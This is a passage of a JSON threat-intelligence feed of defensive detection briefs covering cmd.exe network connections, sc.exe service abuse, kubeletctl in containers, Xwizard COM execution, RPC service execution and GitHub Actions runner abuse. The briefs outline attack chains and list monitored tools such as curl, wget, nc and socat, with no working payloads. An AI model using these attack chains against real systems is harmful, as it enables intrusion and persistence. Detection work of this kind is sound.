endpoints, potentially enabling attackers to download and execute malicious payloads, establish command and control channels, and perform further malicious activities such as data theft, lateral movement, or ransomware deployment. While this detection has a low severity, it serves as an early warning sign of potential compromise and should be investigated promptly.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable process creation logging with command line arguments to capture the full context of cmd.exe executions.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from cmd.exe processes, focusing on connections to external IP addresses, using a network monitoring solution.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious cmd.exe network connections.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, focusing on cmd.exe processes spawned by Office applications or those executing scripts from remote URLs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-suspicious-cmd-network/","summary":"This alert identifies suspicious network connections initiated by the command prompt (cmd.exe) when executed with arguments indicative of script execution, remote resource access, or originating from Microsoft Office applications, which is a common tactic for downloading payloads or establishing command and control.","title":"Suspicious Command Prompt Network Connection","url":"https://feed.craftedsignal.io/briefs/2024-01-suspicious-cmd-network/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Windows Security Event Logs"],"_cs_severities":["low"],"_cs_tags":["privilege-escalation","defense-evasion","execution","windows","service-creation"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft"],"content_html":"\u003cp\u003eThis detection identifies instances where the Service Control utility (sc.exe) is executed from within a script interpreter, such as cmd.exe, PowerShell, or wscript.exe. Attackers may leverage this behavior to create, modify, or start Windows services, often with the intent to elevate privileges or establish persistence on a compromised system. The sc.exe is a legitimate Windows command-line tool used for managing services. Abusing this tool allows attackers to perform malicious actions under the guise of legitimate system administration. This detection is designed to identify anomalous use of sc.exe that deviates from typical administrative tasks, focusing on instances where it\u0026rsquo;s spawned from scripting environments often used for malicious activities. The rule specifically excludes service creations performed by the SYSTEM user.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system via an exploit or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script interpreter (e.g., cmd.exe, powershell.exe).\u003c/li\u003e\n\u003cli\u003eWithin the script interpreter, the attacker uses sc.exe to manage Windows services.\u003c/li\u003e\n\u003cli\u003eThe sc.exe command is used with arguments such as \u0026ldquo;create\u0026rdquo;, \u0026ldquo;start\u0026rdquo;, \u0026ldquo;stop\u0026rdquo;, \u0026ldquo;delete\u0026rdquo;, or \u0026ldquo;config\u0026rdquo; to manipulate service configurations.\u003c/li\u003e\n\u003cli\u003eA new service is created or an existing service is modified to execute a malicious payload.\u003c/li\u003e\n\u003cli\u003eThe malicious service is started, allowing the attacker to execute code with elevated privileges (SYSTEM).\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence by ensuring the malicious service automatically starts upon system reboot.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the created service to execute additional malicious commands or maintain remote access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack could lead to complete system compromise with the attacker gaining SYSTEM level privileges. This can allow for lateral movement within the network, data exfiltration, or installation of persistent backdoors. While the frequency of this specific technique may be low, the potential impact is high due to the elevated privileges gained.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eService Control Spawning via Script Interpreter\u003c/code\u003e to your SIEM to detect this specific behavior and tune it to your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for sc.exe being executed by script interpreters like PowerShell or cmd.exe (as covered in the rule description).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of sc.exe being used with the arguments \u0026ldquo;create\u0026rdquo;, \u0026ldquo;start\u0026rdquo;, \u0026ldquo;stop\u0026rdquo;, \u0026ldquo;delete\u0026rdquo;, or \u0026ldquo;config\u0026rdquo; from scripting environments to identify potentially malicious activity.\u003c/li\u003e\n\u003cli\u003eEnsure proper access controls are in place to limit the ability of users to create or modify services.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-02-service-control-script-spawn/","summary":"Detection of Service Control (sc.exe) being spawned from script interpreter processes, such as PowerShell or cmd.exe, to create, modify, or start services, which may indicate privilege escalation or persistence attempts by an attacker.","title":"Service Control Executed from Script Interpreters","url":"https://feed.craftedsignal.io/briefs/2024-01-02-service-control-script-spawn/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defend for Containers"],"_cs_severities":["high"],"_cs_tags":["container","kubeletctl","lateral-movement","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis rule detects the execution of \u003ccode\u003ekubeletctl\u003c/code\u003e inside a container. Kubeletctl is a command-line tool that interacts with the Kubelet API directly, making the often undocumented API more accessible. Attackers may use it to enumerate the Kubelet API or other resources within the container, potentially indicating lateral movement within the pod. The detection is based on the \u0026ldquo;Defend for Containers\u0026rdquo; integration (version 9.3.0 and later) within the Elastic stack. This activity is significant because \u003ccode\u003ekubeletctl\u003c/code\u003e can expose pod and node details, enabling actions that facilitate discovery and lateral movement from a compromised container.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a container, possibly through a vulnerability in the containerized application or a misconfigured Kubernetes environment.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ekubeletctl\u003c/code\u003e inside the compromised container. This could be facilitated by the tool being present in the container image or downloaded post-compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubeletctl scan\u003c/code\u003e to discover Kubelet endpoints within the Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages \u003ccode\u003ekubeletctl pods\u003c/code\u003e or \u003ccode\u003ekubeletctl runningpods\u003c/code\u003e to enumerate running pods and their details.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the discovered pod information to identify potential targets for lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to use \u003ccode\u003ekubeletctl exec\u003c/code\u003e or \u003ccode\u003ekubeletctl attach\u003c/code\u003e to gain access to other pods within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to port forward using \u003ccode\u003ekubeletctl portForward\u003c/code\u003e to establish connections to services running in other pods.\u003c/li\u003e\n\u003cli\u003eUpon successful lateral movement, the attacker performs further reconnaissance or deploys malicious payloads to achieve their objectives, such as data exfiltration or denial-of-service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution of \u003ccode\u003ekubeletctl\u003c/code\u003e within a container can lead to the exposure of sensitive information about the Kubernetes cluster, including pod details and internal network configurations. This can enable attackers to move laterally within the cluster, potentially compromising other applications and data. The impact could range from data breaches and service disruptions to full cluster compromise depending on the attacker\u0026rsquo;s objectives and the scope of the compromised container\u0026rsquo;s access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect the execution of \u003ccode\u003ekubeletctl\u003c/code\u003e within containers based on process name and arguments.\u003c/li\u003e\n\u003cli\u003eMonitor container network activity for connections to node addresses on Kubelet ports (commonly 10250/10255) and investigate any suspicious patterns.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict pod-to-node access to the Kubelet API.\u003c/li\u003e\n\u003cli\u003eHarden container images by removing unnecessary tools like \u003ccode\u003ekubeletctl\u003c/code\u003e and enforce least privilege principles.\u003c/li\u003e\n\u003cli\u003eEnable and review Kubernetes audit logs to identify the source of interactive sessions into containers, correlating with timestamps of \u003ccode\u003ekubeletctl\u003c/code\u003e execution.\u003c/li\u003e\n\u003cli\u003eEnforce Pod Security Standards to restrict privileged pods and limit node API exposure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-kubeletctl-container-execution/","summary":"This rule detects the execution of kubeletctl inside a container, which can be used to enumerate the Kubelet API or other resources inside the container, potentially indicating lateral movement attempts within the pod.","title":"Kubeletctl Execution Inside Container Detected","url":"https://feed.craftedsignal.io/briefs/2024-01-kubeletctl-container-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","com-object","xwizard","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Component Object Model (COM) facilitates communication between software components. Attackers can leverage Xwizard, a legitimate Windows system binary, to execute COM objects and bypass security measures. This technique allows adversaries to proxy the execution of malicious code through a trusted system utility, making detection more challenging. This activity has been observed since at least 2017, with potential links to PlugX malware variants. The scope of targeting is broad, as any Windows system with vulnerable COM configurations could be susceptible. Defenders should monitor Xwizard execution for suspicious arguments and deviations from expected file paths to identify potential misuse of COM objects.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access via an unconfirmed method (e.g., phishing, exploit).\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the Windows Registry to create a malicious COM object.\u003c/li\u003e\n\u003cli\u003eThe attacker invokes \u003ccode\u003exwizard.exe\u003c/code\u003e with the \u003ccode\u003eRunWizard\u003c/code\u003e argument and a GUID referencing the malicious COM object.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003exwizard.exe\u003c/code\u003e reads the COM object\u0026rsquo;s configuration from the registry.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003exwizard.exe\u003c/code\u003e executes the code associated with the malicious COM object.\u003c/li\u003e\n\u003cli\u003eThe malicious COM object performs unauthorized actions, such as downloading additional payloads or establishing command and control.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence by ensuring the malicious COM object is executed on system startup or user login.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary code, potentially leading to data theft or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on compromised systems. This can lead to data theft, malware installation, or complete system compromise. The targeted sectors are broad, as any Windows system with vulnerable COM configurations is susceptible. While specific victim counts are unavailable, the widespread use of Windows makes this a potentially significant threat. If the attack succeeds, attackers can gain persistent access, escalate privileges, and move laterally within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process execution events for instances of \u003ccode\u003exwizard.exe\u003c/code\u003e with suspicious arguments like \u003ccode\u003eRunWizard\u003c/code\u003e and GUIDs using the \u0026ldquo;Execution of COM object via Xwizard\u0026rdquo; rule as a baseline.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rules provided to detect anomalous Xwizard executions and COM object abuse.\u003c/li\u003e\n\u003cli\u003eAudit and monitor registry modifications, specifically looking for COM object registrations using registry_set rules.\u003c/li\u003e\n\u003cli\u003eEnsure that endpoint detection and response (EDR) solutions are configured to detect and block suspicious process executions originating from \u003ccode\u003exwizard.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) and registry event logging (Event ID 12, 13, 14) for enhanced visibility, as mentioned in the setup guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-xwizard-com-execution/","summary":"Adversaries may abuse Xwizard, a Windows system binary, to execute Component Object Model (COM) objects created in the registry to evade defensive countermeasures by proxying execution through a legitimate system tool.","title":"Xwizard COM Object Execution for Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-xwizard-com-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["SCCM"],"_cs_severities":["medium"],"_cs_tags":["lateral-movement","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Pella Corporation","AdminArsenal","ESET","Veeam"],"content_html":"\u003cp\u003eThis detection rule identifies the remote execution of Windows services over Remote Procedure Call (RPC), a technique often employed for lateral movement within a network. The rule focuses on correlating network connections initiated by \u003ccode\u003eservices.exe\u003c/code\u003e with subsequent child process creation events. While this activity can be a legitimate function of administrators using remote management tools, it also represents a potential attack vector. The rule aims to strike a balance between detecting malicious activity and minimizing false positives arising from routine administrative tasks. The detection logic is based on identifying network connections to \u003ccode\u003eservices.exe\u003c/code\u003e followed by the creation of child processes that are not commonly associated with legitimate service management. The rule requires the use of Elastic Defend or Sysmon for adequate logging coverage.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system within the network.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to move laterally to other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a connection to the target system\u0026rsquo;s \u003ccode\u003eservices.exe\u003c/code\u003e process over RPC using a high port (\u0026gt;= 49152).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established RPC connection to create or start a new service on the remote system.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eservices.exe\u003c/code\u003e process on the remote system spawns a child process related to the newly created or started service.\u003c/li\u003e\n\u003cli\u003eThis new process executes the attacker\u0026rsquo;s payload, potentially granting further access or executing malicious commands.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the newly executed service for persistent access or further lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack could result in unauthorized access to sensitive data, disruption of critical services, or the deployment of ransomware. Lateral movement allows attackers to compromise multiple systems within the network, escalating the impact of the initial breach. Due to the nature of the technique, it can be challenging to distinguish between legitimate administrative activity and malicious actions, leading to delayed detection and increased dwell time for attackers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rules to your SIEM and tune the filters for known-good executables in your environment to reduce false positives.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation (Event ID 1) and network connection (Event ID 3) logging to ensure the required data for the Sigma rules is available.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by these rules, focusing on the parent process and network connection details associated with the spawned child process.\u003c/li\u003e\n\u003cli\u003eConsider excluding known remote management tools from triggering the detection by adding exceptions based on \u003ccode\u003eprocess.executable\u003c/code\u003e or \u003ccode\u003eprocess.args\u003c/code\u003e in the Sigma rules.\u003c/li\u003e\n\u003cli\u003eMonitor the network for unusual RPC activity, especially connections to \u003ccode\u003eservices.exe\u003c/code\u003e from unexpected source IPs.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-remote-service-execution/","summary":"Detection of remote execution of Windows services over RPC by correlating `services.exe` network connections and spawned child processes, potentially indicating lateral movement.","title":"Remote Execution of Windows Services via RPC","url":"https://feed.craftedsignal.io/briefs/2024-01-remote-service-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github-actions","supply-chain","execution","devops"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat focuses on the exploitation of GitHub Actions runners by malicious actors. By gaining the ability to modify or trigger workflows in a linked GitHub repository, attackers can execute arbitrary commands on the runner host. The attack leverages the \u003ccode\u003eRunner.Worker\u003c/code\u003e process or shell interpreters launched via runner entrypoint scripts. Successful exploitation can lead to malicious workflow activity, including code execution, reconnaissance, credential harvesting, and network exfiltration. This presents a significant risk, particularly for organizations relying on self-hosted runners, as it allows attackers to potentially compromise the underlying infrastructure and sensitive data. The Elastic detection rule aims to identify such malicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository linked to a self-hosted runner.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies an existing workflow or creates a new one to inject malicious commands.\u003c/li\u003e\n\u003cli\u003eThe compromised workflow is triggered, initiating the \u003ccode\u003eRunner.Worker\u003c/code\u003e process on the runner host.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eRunner.Worker\u003c/code\u003e process executes a shell interpreter (e.g., bash, sh, zsh) via an entrypoint script.\u003c/li\u003e\n\u003cli\u003eThe shell interpreter executes malicious commands specified in the compromised workflow, such as downloading a payload using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, establishing a reverse shell connection to an attacker-controlled server using \u003ccode\u003enc\u003c/code\u003e or \u003ccode\u003esocat\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance, credential harvesting, or lateral movement within the runner host and connected network.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated from the compromised runner host to the attacker\u0026rsquo;s infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of the self-hosted runner environment. This could result in the theft of sensitive source code, credentials, and other proprietary information. The attack can also be used as a stepping stone for further attacks on the organization\u0026rsquo;s internal network and infrastructure. Affected sectors include software development, DevOps, and any organization using GitHub Actions with self-hosted runners.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via GitHub Actions Runner\u003c/code\u003e to your SIEM to detect suspicious commands executed by the GitHub Actions Runner.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for commands like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ebash\u003c/code\u003e, and \u003ccode\u003essh\u003c/code\u003e spawned by \u003ccode\u003eRunner.Worker\u003c/code\u003e or shell interpreters with \u003ccode\u003eentrypoint.sh\u003c/code\u003e in their command line (see Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies for GitHub repositories and workflows to prevent unauthorized modifications.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit GitHub Actions workflows for suspicious or unexpected commands.\u003c/li\u003e\n\u003cli\u003eIsolate self-hosted runners in a segmented network to limit the impact of a potential compromise.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to provide detailed process execution information for effective detection.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T10:00:00Z","date_published":"2024-01-02T10:00:00Z","id":"/briefs/2024-01-github-actions-runner-execution/","summary":"Adversaries compromising GitHub Actions workflows can execute arbitrary commands on runner hosts, leading to code execution, reconnaissance, credential harvesting, or network exfiltration.","title":"Execution via GitHub Actions Runner","url":"https://feed.craftedsignal.io/briefs/2024-01-github-actions-runner-execution/"}],"language":"en","title":"CraftedSignal Threat Feed — Execution","version":"https://jsonfeed.org/version/1.1"}